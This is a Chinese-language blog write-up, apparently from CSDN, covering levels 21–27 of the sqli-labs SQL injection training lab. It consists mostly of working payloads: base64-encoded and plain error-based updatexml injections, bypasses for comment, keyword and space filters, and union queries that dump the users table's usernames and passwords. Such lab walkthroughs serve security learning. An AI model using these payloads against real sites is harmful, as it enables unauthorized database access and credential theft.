第二十一关
这里用了base64编码加密进来可以看到
来到在线加密把咱们的语句加密一下
加密前:admin' and updatexml(1,concat('~',(select database()),'~'),1) and '
这是加密后的语句YWRtaW4nIGFuZCB1cGRhdGV4bWwoMSxjb25jYXQoJ34nLChzZWxlY3QgZGF0YWJhc2UoKSksJ34nKSwxKSBhbmQgJw
这就爆出数据库了然后接着就是表了
加密前:admin' or updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1) or '
加密后:YWRtaW4nIG9yIHVwZGF0ZXhtbCgxLGNvbmNhdCgxLChzZWxlY3QgZ3JvdXBfY29uY2F0KHRhYmxlX25hbWUpIGZyb20gaW5mb3JtYXRpb25fc2NoZW1hLnRhYmxlcyB3aGVyZSB0YWJsZV9zY2hlbWE9J3NlY3VyaXR5JykpLDEpIG9yICc=
这里我直接爆内容了
加密前:admin' or updatexml(1,concat(1,(select group_concat(username,password) from users)),1) or '
加密后:YWRtaW4nIG9yIHVwZGF0ZXhtbCgxLGNvbmNhdCgxLChzZWxlY3QgZ3JvdXBfY29uY2F0KHVzZXJuYW1lLHBhc3N3b3JkKSBmcm9tIHVzZXJzKSksMSkgb3IgJw==
第二十二关
这里进来发现跟上一关差不多也是加密
然后就试它的闭合根据以往的规律不是单引号就是双引号等
加密后写进去然后爆出数据库名
接着就跟上一关一样了
这里我直接爆数据了
第二十三关
这里试了半天发现都不对然后查看源代码发现注释被过滤了
然后尝试闭合写爆库语句
/Less-23/?id=1' and updatexml(1,concat('!',database(),'!'),1) or '1'='1
接下来就简单了按照流程走
报表:/Less-23/?id=1' and updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1) or'1'='1
爆表中的数据
/Less-23/?id=1' and updatexml(1,concat(1,(select group_concat(username,password) from users)),1) or'1'='1
第二十四关
这里进来页面有些变化翻译一手发现是个登录页面
然后进行注册(二次注入)
注册成功后跳转页面
登录进来后让修改密码
密码更改成功
回到登录界面用admin用户登录用刚才修改的密码
成功登录
第二十五关
and or过滤
此题有and or过滤在构造闭合时 当输入and或or时 会发生报错在错误信息中看到 and直接消失了
这里尝试绕过回显正常/Less-25/?id=1'%26%26 1=1 --+
这里用报错显示出数据库的表
/Less-25/?id=1' ||%20 updatexml(1,concat('!',(select table_name from infoorrmation_schema.tables where table_schema='security' limit 0,1),'!'),1) --+
然后就轻松了跟之前报错差不多就是需要绕过
第二十六关
第二十七关
这一关是存在过滤你需要各种绕过比如大小写绕过、空格字符绕过等
然后这里闭合方式为1' '1确定了回显点/Less-27/?id=-99'%09unioN%09sElect%091,2,3%09'1--+
查看数据库名字
/Less-27/?id=100'%09unioN%09sElect%091,database(),3%09and%09'1%09--+
查看所有表
/?id=100'%09unioN%09sElect%091,(sElect%09group_concat(table_name)from%09information_schema.tables%09where%09table_schema='security'),3%09and%09'1%09--+
查看列
/Less-27/?id=100'%09unioN%09sElect%091,(sElect%09group_concat(column_name)from%09information_schema.columns%09where%09table_schema='security'and%09table_name='users'),3%09and%09'1%09--+
查看表中数据
/Less-27/?id=100'%09unioN%09sElect%091,(sElect%09group_concat(username,password)%09from%09users),3%09and%09'1%09--+
标签:加密,21,Less,09,40,labs,id,concat,schema From: https://blog.csdn.net/2301_81525518/article/details/141400870